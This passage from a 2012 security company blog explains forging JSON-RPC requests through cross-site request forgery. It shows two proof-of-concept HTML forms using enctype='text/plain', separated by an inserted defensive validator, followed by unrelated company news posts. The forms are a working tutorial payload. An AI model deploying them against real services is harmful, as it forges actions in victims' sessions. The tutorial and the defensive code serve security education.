The browser will send "test_name=" (without the quotes) to the server. Now, if you could set the name of the element to the body of the JSON-RPC request, the browser would send it. Since the body of the JSON request contains special characters, you should either put it inside the HTML using single quotes or use a little JavaScript, like this:<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><script></span><br />
<span style="font-family: Courier New, Courier, monospace;">function modifyForm() {</span><br />
<span style="font-family: Courier New, Courier, monospace;"> document.forms[0].elements[0].name = "{\"jsonrpc\": \"2.0\", \"method\": \"subtract\", \"params\": [42, 23], \"id\": 1}";</span><br />
<span style="font-family: Courier New, Courier, monospace;"> return true;</span><br />
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"></script></span><br />
<span style="font-family: Courier New, Courier, monospace;"><form name="csrf_form" method="POST" action="https://example.com/rpchandler" onsubmit="modifyForm();"></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input name="test" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input type="submit" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"></form></span><br />
<br />
<br />
This form will cause the browser to send the JSON-RPC data in the body of the POST request to our target URL (with an equals sign at the end). Only one little problem remains. By default the browser will URL-encode the body, and this will break the JSON-RPC parser. To get around that we can use the enctype="text/plain" attribute on the form. text/plain will cause the browser to skip URL-encoding. It will only turn spaces into + signs, but luckily we don't need spaces in JSON :) So, our form for attacking a JSON-RPC web application will look like this:<br />
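As an added example (not code from the original post), here is the server-side counterpart: a pre-check for a JSON-RPC endpoint that rejects the forged form submission described above, since an HTML form cannot send a JSON content type and the text/plain trick leaves a trailing "=" that strict JSON parsing refuses. The request shape, ALLOWED_ORIGINS and the sample origins are assumptions for the example.

```javascript
// Added example, not code from the original post: reject form-based JSON-RPC requests.
// ALLOWED_ORIGINS and the { method, headers, body } request shape are assumptions.
const ALLOWED_ORIGINS = new Set(["https://example.com"]);   // the application's own origin

function checkJsonRpcRequest(req) {
  const headers = {};
  for (const [k, v] of Object.entries(req.headers || {})) headers[k.toLowerCase()] = v;
  if (req.method !== "POST") return { ok: false, reason: "method" };

  // An HTML form can only submit application/x-www-form-urlencoded, multipart/form-data
  // or text/plain. Insisting on application/json rules out every form-based submission,
  // including the enctype="text/plain" trick from the post.
  const ct = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (ct !== "application/json") return { ok: false, reason: "content-type" };

  // Browsers attach Origin to cross-site POSTs, so a forged form hosted elsewhere fails
  // here even if the content type were somehow right (defence in depth).
  if (headers.origin !== undefined && !ALLOWED_ORIGINS.has(headers.origin)) {
    return { ok: false, reason: "origin" };
  }

  // Strict parse: the form trick leaves a trailing "=" which is not valid JSON. A lenient
  // parser that stops at the closing brace would silently accept the forged body.
  let rpc;
  try { rpc = JSON.parse(req.body); } catch (e) { return { ok: false, reason: "json" }; }
  if (rpc === null || typeof rpc !== "object" || rpc.jsonrpc !== "2.0" || typeof rpc.method !== "string") {
    return { ok: false, reason: "jsonrpc" };
  }
  return { ok: true, rpc };
}

// Constructed requests. FORGED is what the browser sends for the text/plain form in the
// post; LEGIT is the same call issued by the application's own page via XMLHttpRequest.
const FORGED = {
  method: "POST",
  headers: { "Content-Type": "text/plain", "Origin": "https://attacker.example" },
  body: '{"jsonrpc":"2.0","method":"subtract","params":[42,23],"id":1}=',
};
const LEGIT = {
  method: "POST",
  headers: { "Content-Type": "application/json", "Origin": "https://example.com" },
  body: '{"jsonrpc":"2.0","method":"subtract","params":[42,23],"id":1}',
};
```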
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><script></span><br />
<span style="font-family: Courier New, Courier, monospace;">function modifyForm() {</span><br />
<span style="font-family: Courier New, Courier, monospace;"> document.forms[0].elements[0].name = "{\"jsonrpc\":\"2.0\",\"method\":\"subtract\",\"params\":[42,23],\"id\":1}";</span><br />
<span style="font-family: Courier New, Courier, monospace;"> return true;</span><br />
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"></script></span><br />
<span style="font-family: Courier New, Courier, monospace;"><form name="csrf_form" method="POST" action="https://example.com/rpchandler" enctype="text/plain" onsubmit="modifyForm();"></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input name="test" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input type="submit" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"></form></span><br />
<br />
Posted by Anonymous.<br />
<br />
<h2>
DefenseCode @ FSEC - FOI Security Symposium 2012</h2>
Published 2012-09-27.<br />
FSEC, Security Symposium (<a href="http://fsec.foi.hr/">http://fsec.foi.hr</a>), held at the FOI in Varazdin, was the only proper information security event held this year in Croatia where IT security specialists could gather and discuss the latest trends in information security.<br />
<div style="text-align: justify;">
<br />
DefenseCode experts attended the symposium to present and share their findings and expertise on topics related to information security.<br />
<br />
<div style="text-align: left;">
<div style="text-align: justify;">
The first keynote was given by American cryptographer and computer security specialist Bruce Schneier. DefenseCode's CEO Leon Juranic gave a presentation on security product development. Drawing on his own firsthand experience in security software development, Juranic covered the development process and its phases in an IT security context, concentrating on the crucial details that can make or break a project.</div>
</div>
<br />
Leon also covered the more technical aspects of security software development and presented new DefenseCode products, including the ThunderScan source code analyzer and the DefenseCode Web Scanner, intended for black-box security audits.<br />
<br />
<div style="text-align: left;">
You can download the presentation at the following link:</div>
<a href="http://www.defensecode.com/public/DefenseCode_Security_Products_Development_Presentation.pdf">http://www.defensecode.com/public/DefenseCode_Security_Products_Development_Presentation.pdf</a><br />
<br /></div>
<br />
<h2>
A short insight into ADSL security</h2>
Published 2012-09-23, updated 2012-09-27.<br />
<br />
Recently, one of our security researchers has been working on a project related to ADSL security.<br />
During his research with various ADSL routers, cameras and other devices, he also created a simple program that performs a brief on-line test of ADSL device security.<br />
<br />
The program (in fact, a script) will try to connect to your ADSL modem and perform two security checks:<br />
<b>1. It will try to determine if remote administration interface is enabled</b><br />
<b>2. It will also try to login with default password</b><br />
<b><br /></b>
If both checks return positive results, it means that your ADSL modem is not properly configured and is wide open to hacking attacks.<br />
<br />
Check how secure your ADSL router is...<br />
Script is available here:<br />
<a href="http://www.defensecode.com/cgi-bin/adsl-security-check.cgi">http://www.defensecode.com/cgi-bin/adsl-security-check.cgi</a><br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
<div>
<br /></div>
Posted by DefenseCode.<br />
<br />
<h2>
Welcome!!!</h2>
Published 2012-09-13.<br />
Dear visitor, hello and welcome to our blog :)<br />
<br />
DefenseCode is an IT start-up focusing on information security. Our goal is to develop products that<br />
automate the detection of vulnerabilities in web application code, and to provide information security<br />
services to a wide variety of internet businesses.<br />
<br />
We are a relatively young company made up of seasoned IT/information security professionals<br />
interested in anything and everything even remotely related to information security.<br />
<br />
This is why we started this blog. Here we will analyze, comment on and share developments from all<br />
branches of the information security business. We're going to write about computer security, security<br />
research, web application security, penetration testing and broader general topics.<br />
<br />
To begin with, web application security is a widely underappreciated aspect of information security.<br />
While companies spend millions of dollars securing their information infrastructure from malicious<br />
programs, spending lots of money and manpower perfecting their firewalls, hardening their<br />
communications, analyzing routers and demilitarized zones, often enough they spend zero time on<br />
the one thing that remains open to the Internet – their web applications, usually connected to the<br />
databases containing data vital to their businesses.<br />
<br />
This is where we fit in – and we're going to share our experiences and the knowledge we gained from working in the field that helped us shape and implement our products. We are going to talk about safe programming practices, and why they are often neglected or misunderstood.<br />
<br />
While there are many different kinds of vulnerabilities in modern web application code, there are<br />
some that are more prominent than others. By exposing these commonly found errors in code that leave<br />
your system vulnerable, we hope to demonstrate the abilities of DefenseCode software and provide you<br />
with an explanation of why these vulnerabilities occur and how to avoid or mitigate them in the future.<br />
<br />
This blog will hopefully provide you with insight and accurate advice on information security. We are always available for consultation and advice, so feel free to contact us here or through our website.<br />
<br />
Kind Regards,<br />
Leon Juranic<br />
CEO<br />
<br />
Posted by DefenseCode.<br />
<br />
<h2>
DefenseCode Blog</h2>
Published 2012-07-10.<br />
Hello World. :-D<br />
Posted by DefenseCode.